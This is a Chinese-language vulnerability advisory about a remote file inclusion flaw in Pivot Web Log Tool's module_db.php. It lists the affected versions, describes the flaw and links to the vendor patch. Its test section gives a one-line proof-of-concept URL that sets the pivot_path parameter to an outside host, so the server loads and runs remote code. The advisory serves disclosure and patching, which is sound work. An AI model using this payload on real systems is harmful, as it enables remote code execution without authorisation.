发布日期：2004-06-15
更新日期：2004-06-24

受影响系统：

Pivot Web Log Tool 1.10
Pivot Web Log Tool 1.002
Pivot Web Log Tool 1.0 RC2
Pivot Web Log Tool 1.0 RC1
Pivot Web Log Tool 1.0 Final
Pivot Web Log Tool 1.0 beta2b
Pivot Web Log Tool 1.0 beta2

不受影响系统：

Pivot Web Log Tool 1.14

描述：

---

BUGTRAQ  ID: 10553

Pivot是一款基于WEB的帮助用户维护动态站点的工具。

Pivot包含的module_db.php脚本不正确验证用户提交的数据，远程攻击者可以利用这个漏洞以WEB进程权限在系统上执行任意命令。

其中module_db.php脚本对用户提供给'pivot_path'参数数据缺少过滤，提交远程服务器上的恶意文件作为参数，可能以WEB进程权限执行恶意文件中的任意代码。

<*来源：loofus （loofus@0x90.org）
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

loofus （loofus@0x90.org）提供了如下测试方法：

http://www.example.com/pivot/modules/module_db.php?pivot_path=http://www.example.org/

建议：

---

厂商补丁：

Pivot
-----
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

Pivot Upgrade Pivot_1.14.1_full.zip
https://sourceforge.net/project/showfiles.php?group_id=67653&package_id=65955&release_id=245757

浏览次数：2992
严重程度：0（网友投票）